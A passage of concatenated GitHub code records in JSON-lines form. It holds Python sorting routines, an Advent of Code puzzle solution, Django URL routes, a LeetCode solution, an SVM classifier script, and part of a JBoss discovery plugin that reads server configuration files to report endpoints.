celda.tiempo<=inicio:\n indiceinicial=indexcuadrante3\n return (indiceinicial)\n \n cuadrante4=listareduced[division*3:]\n if len(cuadrante4)>0:\n \n indexcuadrante4=len(listareduced)-len(cuadrante4)+indiceinicial\n inicio=cuadrante4[0].tiempo\n fin=cuadrante4[len(cuadrante4)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n if len(cuadrante4)>=30000:\n \n indiceinicial=sortmethod(cuadrante4,celda,indexcuadrante4)\n else:\n indiceinicial=mergesort(cuadrante4,celda,indexcuadrante4)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n indiceinicial=indexcuadrante4\n return (indiceinicial)\n\n elif celda.tiempo>fin:\n indiceinicial=indiceinicial+n-2\n return (indiceinicial)\n\n \n \ndef mergesortprincipal(lista,celda,indiceinicial=0):\n if len(lista)>=30000:\n # print('entro 2')\n index=sortmethod(lista,celda,indiceinicial)\n else:\n # print('entro 1')\n index=mergesort(lista,celda,indiceinicial)\n \n return index\n\ndef mergesort(lista,celda,indiceinicial=0):\n #ingresar o no a la recursion\n n=len(lista)\n if celda.tiempo<=lista[0].tiempo:\n return (indiceinicial)\n #print(\"Se insertara en la posicion 1:\",indiceinicial)\n elif celda.tiempo>=lista[n-1].tiempo:\n indiceinicial=n+indiceinicial\n return (indiceinicial)\n #print(\"Se insertara en la posicion 2:\",n+indiceinicial)\n else:\n \n if len(lista)>5:\n Left=lista[1:(len(lista)//2)]\n Right=lista[(len(lista)//2):len(lista)-1]\n indiceinicial+=1\n else:\n Left=lista[0:(len(lista)//2)]\n Right=lista[(len(lista)//2):len(lista)]\n indiceinicial=indiceinicial \n \n if len(Right)>0:\n indexRight=indiceinicial+len(Left)\n inicio=Right[0].tiempo\n fin=Right[len(Right)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n indiceinicial=mergesort(Right,celda,indexRight)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n \n indiceinicial=indexRight\n return (indiceinicial)\n \n elif celda.tiempo>fin:\n indiceinicial=indiceinicial+n-2\n return (indiceinicial)\n\n if len(Left)>0:\n indexLeft=indiceinicial\n inicio=Left[0].tiempo\n fin=Left[len(Left)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n indiceinicial=mergesort(Left,celda,indexLeft)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n\n indiceinicial=indexLeft\n return (indiceinicial)\n\n \n \n \n \n \n\n \n return(indiceinicial)\n\ndef sortmethodoriginal(lista,celda,indiceinicial=0):\n #ingresar o no a la recursion\n n=len(lista)\n if celda.tiempo<=lista[0].tiempo:\n return (indiceinicial)\n #print(\"Se insertara en la posicion 1:\",indiceinicial)\n elif celda.tiempo>=lista[n-1].tiempo:\n indiceinicial=n+indiceinicial\n return (indiceinicial)\n #print(\"Se insertara en la posicion 2:\",n+indiceinicial)\n else:\n if celda.tiempo0:\n \n indexLeft=indiceinicial\n inicio=Left[0].tiempo\n fin=Left[len(Left)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n if (Cuadrant):\n print(inicio)\n print(fin)\n print(Right[0].tiempo)\n print(Right[-1].tiempo)\n print(lista[n//2].tiempo)\n print(celda.tiempo)\n \n print('no debia entrar')\n indiceinicial=sortmethodoriginal(Left,celda,indexLeft)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n indiceinicial=indexLeft\n return (indiceinicial)\n\n \n if len(Right)>0:\n \n indexRight=indiceinicial+len(Left)\n inicio=Right[0].tiempo\n fin=Right[len(Right)-1].tiempo\n if celda.tiempo>inicio and celda.tiempo<=fin:\n indiceinicial=sortmethodoriginal(Right,celda,indexRight)\n return (indiceinicial)\n elif celda.tiempo<=inicio:\n \n indiceinicial=indexRight\n return (indiceinicial)\n elif celda.tiempo>fin:\n indiceinicial=indiceinicial+n\n return (indiceinicial)\n \n return(indiceinicial)\n\n\n#Merge sort complete\ndef merge_sort_complete(lista): \n \"\"\"\n Lo primero que se ve en el psudocódigo es un if que\n comprueba la longitud de la lista. Si es menor que 2, 1 o 0, se devuelve la lista.\n ¿Por que? Ya esta ordenada. \n \"\"\"\n if len(lista) < 2:\n return lista\n \n # De lo contrario, se divide en 2\n else:\n middle = len(lista) // 2\n right = merge_sort_complete(lista[:middle])\n left = merge_sort_complete(lista[middle:])\n return merge(right,left)\n \n\n\n#Merge\ndef merge(lista1, lista2):\n \"\"\"\n merge se encargara de intercalar los elementos de las dos\n divisiones.\n \"\"\"\n i, j = 0, 0 # Variables de incremento\n result = [] # Lista de resultado\n \n # Intercalar ordenadamente\n while(i < len(lista1) and j < len(lista2)):\n if (lista1[i].tiempo < lista2[j].tiempo):\n result.append(lista1[i])\n\n i += 1\n else:\n result.append(lista2[j])\n j += 1\n \n # Agregamos los resultados a la lista\n result += lista1[i:]\n result += lista2[j:]\n\n # Retornamos los resultados\n return result\n\n#Bucket sort\n\n #insert\ndef insertionSort(b):\n for i in range(1, len(b)):\n up = b[i]\n j = i - 1\n while j >= 0 and b[j].tiempo > up.tiempo:\n b[j + 1] = b[j]\n j -= 1\n b[j + 1] = up \n return b \n #Bucket\ndef bucketSort(x,maximum):\n B=[]\n bucket=10\n divider=ceil((maximum+1)/bucket)\n for i in range(bucket):\n B.append([])\n for element in x:\n j=floor(element.tiempo/divider)\n B[j].append(element)\n for i in range(len(B)):\n B[i] = insertionSort(B[i])\n\n k = 0\n for i in range(len(B)):\n for j in range(len(B[i])):\n x[k] = B[i][j]\n k += 1\n return x\n\n\n \n\n","repo_name":"JhonSaguay/OFM-Ordered-Fast-Marching-Method-","sub_path":"ordenamiento.py","file_name":"ordenamiento.py","file_ext":"py","file_size_in_byte":10027,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72388610169","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom collections import namedtuple\n\n\ndef load_firewall(fname='input.txt'):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n fpath = os.path.join(dir_path, fname)\n\n scanners = {}\n with open(fpath) as f:\n for line in f:\n depth, scanner_range = map(int, line.replace(' ', '').split(':'))\n scanners[depth] = Scanner(depth, scanner_range)\n return scanners\n\n\nScanner = namedtuple('Scanner', ['depth', 'range'])\n\n\ndef period(scanner):\n return 2 * (scanner.range - 1)\n\n\ndef compute_severity(firewall, offset=0):\n severity, times_caught = 0, 0\n for depth, scanner in firewall.iteritems():\n ostensible_depth = depth + offset\n if ostensible_depth % period(scanner) == 0:\n severity += scanner.depth * scanner.range\n times_caught += 1\n return severity, times_caught\n\n\ndef packet_caught(firewall, offset):\n for depth, scanner in firewall.iteritems():\n if (depth + offset) % period(scanner) == 0:\n return True\n return False\n\n\ndef compute_safe_offset(firewall):\n offset = 0\n while packet_caught(firewall, offset):\n offset += 1\n return offset\n\n\nif __name__ == '__main__':\n firewall = load_firewall()\n print('Total severity is %d (caught %d times)!' % compute_severity(firewall))\n print('First safe offset is %d!' % compute_safe_offset(firewall))\n\n\n","repo_name":"devmacrile/aoc-2017","sub_path":"solutions/day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39333668924","text":"# \n# VAZ Projects\n# \n# \n# Author: Marcelo Tellier Sartori Vaz \n\n\n\nfrom django.urls import path\n\nfrom . import views\n\n\napp_name = 'siteApp'\n\nurlpatterns = [\n\tpath( '',\t\t\t\t\t\t\tviews.HomeView.as_view(),\t\tname = 'home' ),\n\tpath( 'about-me',\t\t\t\t\tviews.AboutMeView.as_view(),\tname = 'about_me' ),\n\tpath( 'search',\t\t\t\t\t\tviews.SearchView.as_view(),\t\tname = 'search' ),\n\tpath( 'search/page/',\t\tviews.SearchView.as_view(),\t\tname = 'search' ),\n\tpath( 'sitemap.xml',\t\t\t\tviews.SitemapView.as_view(),\tname = 'sitemap' ),\n]","repo_name":"Marcelotsvaz/vaz-projects","sub_path":"application/siteApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12972836325","text":"class Solution:\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n self.m = m\n self.n = n\n \n # 状态定义:dp[i][j]表示从dp[0][0]到dp[i][j]的路径数量\n \n # 初始化:dp[0][0] = grid[0][0]\n dp = [[0 for i in range(n)] for j in range(m)]\n dp[0][0] = 1\n \n # 状态转移:到当前节点路径数量 = 从上往当前节点走路径数 + 从左...\n # dp[i][j] = dp[i - 1][j] + dp[i][j - 1]\n for i in range(m):\n for j in range(n):\n if (i, j) == (0, 0):\n continue\n up = 0\n if self.inBound((i - 1, j)):\n up = dp[i - 1][j]\n left = 0\n if self.inBound((i, j - 1)):\n left = dp[i][j - 1]\n dp[i][j] = left + up\n \n # print(dp)\n \n # 终点:右下角\n return dp[-1][-1]\n \n def inBound(self, coo):\n if coo[0] >= 0 and coo[0] < self.m and coo[1] >= 0 and coo[1] < self.n:\n return True\n return False\n","repo_name":"jingwenh/Leetcode2","sub_path":"Dynamic Programming/62. Unique Paths.py","file_name":"62. Unique Paths.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27495331252","text":"from sklearn import svm\nfrom sklearn.model_selection import cross_val_score\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn.metrics import roc_curve, auc, f1_score\n\n#加载数据集\ndef loadDataSet(filename):\n dataSet = pd.read_csv(filename, header=None)\n dataSet = dataSet.fillna(0)# Nan -> 0\n dataSet = dataSet.values\n m, n = dataSet.shape\n data_X = dataSet[:, :n-1]\n data_Y = np.where(dataSet[:, n - 1]>0, 1,-1)\n\n return data_X, data_Y\n\ntrain_data_filename = \"gpl96.csv\"\ntest_data_filename = \"gpl97.csv\"\nX_train, Y_train = loadDataSet(train_data_filename)\nX_test, Y_test = loadDataSet(test_data_filename)\nclf = svm.SVC(C=0.8, kernel='linear', decision_function_shape='ovo')\nclf.fit(X_train, Y_train)\n\ntrain_accuracy = clf.score(X_train, Y_train)\nprint(\"train_accuracy:\", train_accuracy)\n\ntest_accuracy = clf.score(X_test, Y_test)\nprint(\"test_accuracy:\", test_accuracy)\n\n# print('train_decision_function:',clf.decision_function(X_train))\n# print('predict_result:', clf.predict(X_train))\n# print(clf.predict(X_test), Y_test)\nf1 = f1_score(Y_test, clf.predict(X_test))\nprint('F1 score', f1)\n\ntest_predict_label = clf.decision_function(X_test)\nfpr, tpr, threshold = roc_curve(Y_test, test_predict_label)\n\n# print(fpr,tpr,threshold)\nroc_auc = auc(fpr, tpr)\n\nplt.figure()\nlw = 2\nplt.figure(figsize=(10, 10))\nplt.plot(fpr, tpr, color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc) ###假正率为横坐标,真正率为纵坐标做曲线\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC curve')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n\n","repo_name":"justarter/JCCX0001-Biomedical-Signal-Processing","sub_path":"SVM/sklearn_svm.py","file_name":"sklearn_svm.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2853080645","text":"def RadixSort(nums):\r\n \"\"\"use 10 as the base for radix\r\n so the length of int in decimal becomes the time of iteration\"\"\"\r\n max_digit = max(map(len, map(str, nums)))\r\n radix = 1\r\n for d in range(max_digit):\r\n counter = [0] * 10\r\n partial_sorted = [0] * len(nums)\r\n for i in range(len(nums)):\r\n counter[nums[i]%(radix*10)//radix] += 1\r\n for i in range(1, len(counter)):\r\n counter[i] += counter[i - 1]\r\n for i in range(len(nums) - 1, -1, -1):\r\n partial_sorted[counter[nums[i]%(radix*10)//radix] - 1] = nums[i] # index -1 because A and sorted_A starts from index 0\r\n counter[nums[i]%(radix*10)//radix] -= 1\r\n nums = partial_sorted\r\n radix *= 10\r\n return nums\r\n\r\n\r\nif __name__ == '__main__':\r\n import random\r\n length = 1000\r\n A = list(range(length))\r\n random.shuffle(A)\r\n print(A)\r\n check = list(range(length))\r\n A = RadixSort(A)\r\n print(A)\r\n print(A == check)\r\n","repo_name":"hiltonjiang/LeetCode","sub_path":"algorithm-and-data-structure/algorithm/排序/RadixSort.py","file_name":"RadixSort.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26633651691","text":"#coding=utf-8\nfrom plugins import Plugin\nfrom appilog.common.system.types.vectors import ObjectStateHolderVector\nfrom appilog.common.system.types import ObjectStateHolder\nfrom com.hp.ucmdb.discovery.library.communication.downloader.cfgfiles import GeneralSettingsConfigFile\n\nimport ip_addr\nimport entity\nimport re\nimport logger\nimport modeling\nimport file_system\nimport file_topology\nimport jee\nimport jboss_discoverer\nimport netutils\nfrom fptools import partiallyApply\nimport fptools\nfrom iteratortools import first, keep\nimport jee_discoverer\nfrom com.hp.ucmdb.discovery.library.clients import ClientsConsts\n\nclass JbossServerPlugin(Plugin):\n\n def isApplicable(self, context):\n mainProcesses = context.application.getMainProcesses()\n if not (mainProcesses and mainProcesses[0]):\n logger.warn(\"No JBoss process found\")\n return 0\n return 1\n\n\nclass Jboss3to6ServerPlugin(JbossServerPlugin):\n '''\n Purpose of plugin is reporing of server name and domain name by cmd-line\n '''\n def __init__(self):\n Plugin.__init__(self)\n\n def process(self, context):\n application = context.application\n osh = application.getOsh()\n process = application.getMainProcesses()[0]\n command_line = process.commandLine\n server_name = 'default'\n p = 'org\\.jboss\\.Main.*?\\s+-{1,2}(?:c\\s+|configuration\\s*=\\s*)([\\w_\\.-]+)'\n m = re.search(p, command_line)\n if m is not None:\n server_name = m.group(1)\n logger.debug('Found jboss ', server_name, ' configuration')\n else:\n logger.debug('Found jboss default configuration')\n osh.setAttribute('j2eeserver_servername', server_name)\n #TODO: replace to jee.ServerTopologyBuilder._composeFullName\n osh.setAttribute('j2eeserver_fullname', server_name)\n osh.setAttribute('name', server_name)\n modeling.setJ2eeServerAdminDomain(osh, server_name)\n modeling.setAppServerType(osh)\n\n if context.client.getClientType() != ClientsConsts.WMI_PROTOCOL_NAME:\n self.reportendPortByConfigfile(context)\n\n def reportendPortByConfigfile(self,context):\n logger.debug(\"reporting endpoints for jboss3-6 using configfile\")\n endpointOSHV = ObjectStateHolderVector()\n ip = context.application.getApplicationIp()\n shell = context.client\n fs = file_system.createFileSystem(shell)\n globalSettings = GeneralSettingsConfigFile.getInstance()\n loadExternalDTD = globalSettings.getPropertyBooleanValue('loadExternalDTD', 0)\n application = context.application\n osh = application.getOsh()\n process = application.getMainProcesses()[0]\n path = file_system.getPath(fs)\n ### JBoss server System Properties discovery:\n cmdLineElements = jee.JvmCommandLineDescriptor(process.commandLine).parseElements()\n serverSystemProperties = jboss_discoverer.SystemPropertiesDiscoverer().discoverProperties(fs, cmdLineElements)\n # JBoss HomeDir path discovery:\n jbossHomePath = jboss_discoverer.discoverHomeDirPath(fs, serverSystemProperties, cmdLineElements)\n if not jbossHomePath:\n logger.warn(\"Failed to report endpoints for jboss3-6 using configfile, because of the configfile cannot be found.\")\n return\n # JBoss version discovery:\n versionLayout = None\n try:\n versionLayout = jboss_discoverer.VersionLayout(fs, jbossHomePath)\n except:\n logger.debugException('Failed to create JBoss layout.')\n logger.reportWarning('Failed to create JBoss Layout. No endpoints from config file will be reported.')\n return\n versionInfoDiscoverer = jboss_discoverer.VersionInfoDiscovererByShell(shell, versionLayout)\n versionInfo = versionInfoDiscoverer.discoverVersion()\n platformTrait = jboss_discoverer.getPlatformTrait(versionInfo)\n # Setting JBoss bind address by default, if jboss.bind.address wasn't set:\n serverSystemProperties.setdefault('jboss.bind.address',\n (platformTrait.majorVersion.value() == 3\n and '0.0.0.0'\n or '127.0.0.1'))\n # resolve JBoss File Separator:\n serverSystemProperties['/'] = fs.FileSeparator\n # set corresponding properties to found values:\n serverSystemProperties['jboss.home.dir'] = jbossHomePath\n serverSystemProperties['jboss.home.url'] = ''.join((jbossHomePath,'/'))\n # resolve relative properties with custom or default values:\n if jbossHomePath:\n serverSystemProperties.setdefault('jboss.lib.url', path.join(jbossHomePath, 'lib'))\n serverSystemProperties.setdefault('jboss.server.base.dir', path.join(jbossHomePath, 'server'))\n serverSystemProperties.setdefault('jboss.server.base.url', ''.join((serverSystemProperties.get('jboss.home.url'), '/server/')))\n serverSystemProperties.setdefault('jboss.common.base.url', ''.join((serverSystemProperties.get('jboss.home.url'), '/common/')))\n serverSystemProperties.setdefault('jboss.common.lib.url', ''.join((serverSystemProperties.get('jboss.common.base.url'), '/lib/')))\n # Setting JBoss default server name, if jboss.server.name wasn't set:\n serverSystemProperties.setdefault('jboss.server.name',\n (platformTrait.majorVersion.value() == 4\n and platformTrait.isEAP()\n and 'production'\n or 'default'))\n # ServerHomeDir path discovery:\n serverHomePath = jboss_discoverer.discoverServerHomeDirPath(fs, serverSystemProperties.get('jboss.server.name'), jbossHomePath, serverSystemProperties)\n # set corresponding properties to found values:\n serverSystemProperties['jboss.server.home.dir'] = serverHomePath\n serverSystemProperties['jboss.server.url'] = ''.join((serverHomePath,'/'))\n serverSystemProperties['jboss.server.home.url'] = ''.join((serverHomePath,'/'))\n if serverHomePath:\n serverSystemProperties.setdefault('jboss.server.temp.dir', path.join(serverHomePath, 'tmp'))\n serverSystemProperties.setdefault('jboss.server.tmp.dir', path.join(serverHomePath, 'tmp'))\n serverSystemProperties.setdefault('jboss.server.data.dir', path.join(serverHomePath, 'data'))\n serverSystemProperties.setdefault('jboss.server.log.dir', path.join(serverHomePath, 'log'))\n serverSystemProperties.setdefault('jboss.server.config.url', ''.join((serverSystemProperties.get('jboss.server.home.url'), '/conf/')))\n serverSystemProperties.setdefault('jboss.server.lib.url', ''.join((serverSystemProperties.get('jboss.server.home.url'), '/lib/')))\n # Server ConfigDir discovery:\n serverConfigPath = jboss_discoverer.discoverServerConfigPath(fs, serverSystemProperties.get('jboss.server.config.url'), serverHomePath)\n logger.debug('Found server config path: %s' % serverConfigPath)\n\n ### Config files / resources dirs paths discovery:\n serverConfigParser = jboss_discoverer.createServerConfigParser(loadExternalDTD, platformTrait)\n configFilePath = None\n # For JBoss 3.x - 4.x path to Binding Configuration stored in main-config (jboss-service.xml): \n try:\n if platformTrait.majorVersion.value() in (3, 4):\n configFilePath = path.join(serverConfigPath, 'jboss-service.xml')\n configFile = fs.getFile(configFilePath, [file_topology.FileAttrs.CONTENT, file_topology.FileAttrs.PATH])\n # For 5.0, 5.0 EAP, 5.1, 5.1 EAP, 6.0, 6.1\n # there is some custom settings file can be defined in ${jboss.server.config.url}/bootstrap/profile.xml file:\n # - path to custom main config file\n # - path to bindings configuration\n # - list of JEE resources dirs\n elif platformTrait.majorVersion.value() in (5, 6):\n profileLayout = jboss_discoverer.ProfileLayout(fs, serverConfigPath)\n profileDiscoverer = jboss_discoverer.ProfileDiscoverer(shell, profileLayout, serverConfigParser)\n # parse settings from profile.xml and resolve expression in value:\n # find custom or get default path to jboss-service.xml\n configFilePath = serverSystemProperties.getFilePathFromURLValue(serverSystemProperties.resolveProperty(profileDiscoverer.discoverConfigFilePathName())) \\\n or path.join(serverConfigPath, 'jboss-service.xml')\n configFile = fs.getFile(configFilePath, [file_topology.FileAttrs.CONTENT, file_topology.FileAttrs.PATH])\n except:\n logger.debugException('Failed to get JBoss service config file. Plug-in aborted.')\n raise Exception('Failed to get JBoss service config file. Plug-in aborted.')\n ### Bootstrap files discovery:\n bootstrapLayout = jboss_discoverer.BootstrapLayout(fs, serverConfigPath)\n bootstrapParser = jboss_discoverer.BootstrapParser()\n bootstrapDiscoverer = jboss_discoverer.BootstrapDiscovererByShell(shell, bootstrapLayout, bootstrapParser)\n bootstrapConfigFiles = bootstrapDiscoverer.discoverBootstrapConfigFiles(serverSystemProperties)\n configFiles, resourcesDirs, farmDirs, bindingsDirs, bindingsConfigs = bootstrapDiscoverer.discoverServerConfigAndResources(bootstrapConfigFiles, serverSystemProperties)\n if not configFiles:\n configFiles.append(configFile)\n configFiles = filter(lambda x: x.content, configFiles)\n\n configFilesContents = map(lambda x: x.content, configFiles)\n\n if not resourcesDirs:\n for configContent in configFilesContents:\n resourcesDirsListWithExpressions = serverConfigParser.parseResourcesDirsList(configContent)\n resourcesDirsList = map(serverSystemProperties.getFilePathFromURLValue, map(serverSystemProperties.resolveProperty, resourcesDirsListWithExpressions))\n for pathValue in resourcesDirsList:\n absPath = path.isAbsolute(pathValue) and pathValue \\\n or path.join(serverSystemProperties.get('jboss.server.url'), pathValue)\n resourcesDirs.append(path.normalizePath(absPath))\n bindingsConfigsLayout = \\\n jboss_discoverer.BindingsConfigsLayout(fs, bindingsDirs)\n bindingsConfigsDiscoverer = \\\n jboss_discoverer.BindingsConfigsDiscovererByShell(shell,\n bindingsConfigsLayout,\n bootstrapParser)\n bindingsConfigs.extend(\n bindingsConfigsDiscoverer.discoverBindingsConfigFiles())\n if not bindingsConfigs:\n for configContent in configFilesContents:\n bindingConfigWithExpressions = serverConfigParser.parseBindingManagerConfigPath(configContent)\n bindingConfig = serverSystemProperties.getFilePathFromURLValue(serverSystemProperties.resolveProperty(bindingConfigWithExpressions))\n bindingsConfigs.append(bindingConfig)\n bindingConfig = bindingsConfigs[0] if bindingsConfigs else None\n\n ipAddressList = context.framework.getTriggerCIDataAsList('ip_address_list')\n endpoints = []\n bindingsWithExpressions = []\n # at first read port binding configuration directly from jboss-services.xml\n if not bindingConfig:\n if configFile.content:\n bindingsWithExpressions = serverConfigParser.parseBindingsFromJBossServiceXml(configFile.content)\n else: # in case of binding configuration separated in custom bindings file\n bidingConfigContent = fs.getFile(bindingConfig, [file_topology.FileAttrs.CONTENT]).content\n # JBoss version 3.x - 4.x doesn't support portOffset, create endpoints as is\n if platformTrait.majorVersion.value() in (3, 4):\n bindingManagerName = serverConfigParser.parseBindingManagerConfigName(configFile.content)\n bindingsWithExpressions = serverConfigParser.parseBindingsFromBindingManagerConfig(bidingConfigContent, bindingManagerName)\n # In JBoss version 5.x - 6.x except endpoints, there are offset and default host\n if platformTrait.majorVersion.value() in (5, 6):\n # get ports configuration\n activeMetadataSetName = serverConfigParser.parseActiveMetadataSetName(bidingConfigContent)\n metadataSetWithExpressions = serverConfigParser.parseMetadataSetConfiguration(bidingConfigContent, activeMetadataSetName)\n # get offset and defaultHost configuration\n activeBindingSetNameWithExpression = serverConfigParser.parseActiveBindingSetName(bidingConfigContent)\n activeBindingSetName = serverSystemProperties.resolveProperty(activeBindingSetNameWithExpression)\n portOffsetWithExpression, defaultHostWithExpression = serverConfigParser.parseBindingSetConfiguration(bidingConfigContent, activeBindingSetName)\n # resolve expressions in portOffset and defaultHost:\n portOffset = entity.Numeric(int)\n defaultHost = None\n try:\n portOffset.set(serverSystemProperties.resolveProperty(portOffsetWithExpression))\n defaultHost = serverSystemProperties.resolveProperty(defaultHostWithExpression)\n except Exception:\n logger.debug('Failed to get port-offset and defaultHost')\n # apply portOffset and set default host to bindings:\n for binding in metadataSetWithExpressions:\n portOrigValue = entity.Numeric(int)\n portWithOffset = entity.Numeric(int)\n try:\n portOrigValue.set(serverSystemProperties.resolveProperty(binding.getPort()))\n offset = portOffset.value() or 0\n portWithOffset.set(portOrigValue.value() + offset)\n host = binding.getHost() or defaultHost\n bindingsWithExpressions.append(jboss_discoverer.ServerSocketDescriptor(str(portWithOffset), host))\n except Exception:\n logger.debug('Failed to apply port offset or default host')\n\n # resolve system properties expressions in bindings:\n for binding in bindingsWithExpressions:\n try:\n portValue = serverSystemProperties.resolveProperty(binding.getPort())\n port = entity.Numeric(int)\n port.set(portValue)\n # in case of host doesn't defined jboss is using ${jboss.bind.address}\n host = serverSystemProperties.resolveProperty(binding.getHost() or '${jboss.bind.address}')\n host = (host == '127.0.0.1' and ip or host)\n hostAddresses = (host == '0.0.0.0' and ipAddressList\n or (host,))\n for address in hostAddresses:\n endpoint = netutils.createTcpEndpoint(address, port.value())\n endpoints.append(endpoint)\n logger.debug('the binding port is,',port.value())\n logger.debug('the address is:',address)\n\n endpoint = netutils.Endpoint(port.value(), netutils.ProtocolType.TCP_PROTOCOL, address)\n endpointOSH = modeling.createIpServerOSH(endpoint)\n hostosh = modeling.createHostOSH(ip)\n endpointOSH.setContainer(hostosh)\n linkOsh = modeling.createLinkOSH(\"usage\", context.application.getOsh(), endpointOSH)\n endpointOSHV.add(endpointOSH)\n endpointOSHV.add(linkOsh)\n logger.debug('Get ip using configfile:',ip)\n logger.debug('Get port using configfile:', port)\n except Exception:\n logger.debug('Failed to create server endpoint')\n if endpointOSHV:\n context.resultsVector.addAll(endpointOSHV)\n\n\nclass Jboss7StandaloneServerPlugin(JbossServerPlugin):\n '''\n Purpose of plugin is reporing of server name and domain name by config-file\n '''\n def __init__(self):\n Plugin.__init__(self)\n\n def process(self, context):\n application = context.application\n osh = application.getOsh()\n shell = context.client\n fs = file_system.createFileSystem(shell)\n ip = application.getConnectionIp()\n dns_resolver = jee_discoverer.DnsResolverDecorator(\n netutils.createDnsResolverByShell(shell), ip)\n process = application.getMainProcesses()[0]\n cmd_line = process.commandLine\n server_runtime = jboss_discoverer.createServerRuntime(cmd_line, ip)\n home_dir = server_runtime.findHomeDirPath()\n serverBaseDir = server_runtime.findServerBaseDirPath()\n serverConfigDir = server_runtime.findServerConfigDirPath()\n config = server_runtime.extractOptionValue('--server-config') or server_runtime.extractOptionValue('-c')\n layout = jboss_discoverer.StandaloneModeLayout(fs, home_dir, config, serverBaseDir, serverConfigDir)\n loadDtd = 0\n server_config_parser = jboss_discoverer.ServerConfigParserV7(loadDtd)\n standalone_config_path = layout.getStandaloneConfigPath() \n standalone_config_file = None\n try:\n standalone_config_file = layout.getFileContent(standalone_config_path) \n except:\n logger.debugException('Failed getting JBoss config file. No extra data will be reported')\n raise Exception('Failed getting JBoss config file. No extra data will be reported')\n content = standalone_config_file.content\n standalone_config_with_expressions = (\n server_config_parser.parseStandaloneServerConfig(content))\n server_properties = jboss_discoverer.SystemProperties()\n properties_from_cmd_line = server_runtime.findJbossProperties()\n server_properties.update(properties_from_cmd_line)\n config_props = standalone_config_with_expressions.getSystemProperties()\n server_properties.update(config_props)\n standalone_config = server_config_parser.resolveStandaloneServerConfig(\n standalone_config_with_expressions, server_properties)\n server_name = standalone_config.getServerName()\n if not server_name:\n if serverBaseDir is not None:\n path_util = file_system.getPath(fs)\n server_name = path_util.baseName(serverBaseDir)\n else:\n p = '-Djboss.node.name=([\\w_\\.-]+)\\s'\n jnn = re.search(p, cmd_line)\n p = '-Djboss.server.name=([\\w_\\.-]+)\\s'\n jsn = re.search(p, cmd_line)\n if jnn is not None:\n server_name = jnn.group(1)\n elif jsn is not None:\n server_name = jsn.group(1)\n else:\n try:\n server_name = dns_resolver.resolveHostnamesByIp(ip)[0]\n except netutils.ResolveException:\n server_name = 'Default'\n if server_name is not None:\n osh.setAttribute('j2eeserver_servername', server_name)\n #TODO: replace to jee.ServerTopologyBuilder._composeFullName\n osh.setAttribute('j2eeserver_fullname', server_name)\n osh.setAttribute('name', server_name)\n modeling.setJ2eeServerAdminDomain(osh, server_name)\n modeling.setAppServerType(osh)\n\n ##reportEndpointByConfigFile\n self.reportEndpointByConfigFile(context, shell, standalone_config)\n\n def reportEndpointByConfigFile(self,context, shell, standalone_config):\n logger.debug(\"reporting endpoints for jboss7 using configfile\")\n endpointOSHV = ObjectStateHolderVector()\n interfaces = standalone_config.getInterfaces()\n names = []\n addresses = []\n for interface in interfaces:\n names.append(interface.getName())\n addresses.append(interface.getInetAddress())\n interfaceDict = dict(zip(names,addresses))\n socketbindgroups = standalone_config.getSocketBindingGroup()\n socketbinds = socketbindgroups.getBindings()\n for socketbind in socketbinds:\n port = socketbind.getPort()\n host = interfaceDict.get(socketbind.getInterfaceName())\n ip = None\n if port:\n if not host or host == '*' or host == '127.0.0.1':\n if context.application.getApplicationIp():\n ip = context.application.getApplicationIp()\n elif netutils.isValidIp(host):\n ip = host\n else:\n ip = netutils.resolveIP(shell,host)\n if ip:\n endpoint = netutils.Endpoint(port, netutils.ProtocolType.TCP_PROTOCOL, ip)\n endpointOSH = modeling.createIpServerOSH(endpoint)\n hostosh = modeling.createHostOSH(ip)\n endpointOSH.setContainer(hostosh)\n linkOsh = modeling.createLinkOSH(\"usage\", context.application.getOsh(), endpointOSH)\n endpointOSHV.add(endpointOSH)\n endpointOSHV.add(linkOsh)\n logger.debug('Get ip using configfile standalone.xml:',ip)\n logger.debug('Get port using configfile standalone.xml:', port)\n if endpointOSHV:\n context.resultsVector.addAll(endpointOSHV)\n\n\nclass Jboss7ManagedServerPlugin(JbossServerPlugin):\n '''\n Purpose of plugin is reporing of server name and domain name by cmd-line\n '''\n def __init__(self):\n Plugin.__init__(self)\n\n def __parse_server_name_from_server_option(self, element):\n '''\n Parse server name from -D[Server:] param\n @types: jee.CmdLineElement -> str?\n '''\n element_name = element.getName()\n if element_name.startswith('[Server:') != 0:\n logger.debug('Found by server param: %s' % element_name[8:-1])\n return element_name[8:-1]\n\n def __parse_server_name_from_log_file_path(self, element, path_util):\n '''\n Parse server name from log-file param\n @types: jee.CmdLineElement, file_topology.Path -> str?\n '''\n element_name = element.getName()\n if element_name == 